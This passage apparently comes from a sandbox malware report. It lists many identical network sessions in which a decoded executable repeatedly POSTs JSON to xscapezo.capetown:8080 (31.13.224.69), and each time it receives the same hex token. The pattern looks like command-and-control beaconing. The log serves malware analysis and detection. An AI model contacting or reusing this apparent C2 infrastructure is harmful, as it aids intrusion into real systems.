Dec 16, 2024 12:18:35.632550955 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:18:35 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49742	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:18:35.865670919 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:18:37.127721071 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:18:36 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49743	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:18:37.365828037 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:18:38.626528025 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:18:38 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49744	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:18:38.865314007 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:18:40.115755081 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:18:39 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49745	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:18:40.349771023 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:18:41.614937067 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:18:41 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49746	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:18:41.850178957 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:18:43.126413107 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:18:42 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49747	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:18:43.365725994 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:18:44.664764881 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:18:44 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49748	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:18:44.897996902 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:18:46.155132055 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:18:45 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49749	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:18:46.381827116 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:18:47.679086924 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:18:47 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49750	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:18:47.912899017 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:18:49.163081884 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:18:48 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49751	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:18:49.403569937 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:18:50.684722900 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:18:50 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49752	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:18:50.913223982 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:18:52.270313978 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:18:52 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49753	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:18:52.506052971 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:18:53.830374002 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:18:53 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49754	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:18:54.067876101 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:18:55.350877047 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:18:55 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49755	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:18:55.612649918 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:18:56.860637903 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:18:56 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49756	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:18:57.099179983 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:18:58.347475052 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:18:58 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49757	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:18:58.584530115 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:18:59.869250059 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:18:59 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49758	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:00.101306915 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:01.375282049 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:01 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49760	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:01.615132093 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:03.469422102 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:03 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49761	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:03.725904942 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:06.495816946 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:06 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49773	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:06.724934101 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:07.976933956 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:07 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49774	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:08.209032059 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:09.454586983 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:09 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49780	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:09.693304062 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:10.974291086 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:10 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49786	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:11.212908983 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:12.523499012 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:12 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49787	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:12.757860899 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:14.004390001 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:13 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49793	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:14.243379116 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:15.572176933 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:15 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49799	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:15.803679943 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:17.071687937 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:16 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49804	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:17.303875923 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:18.557284117 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:18 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
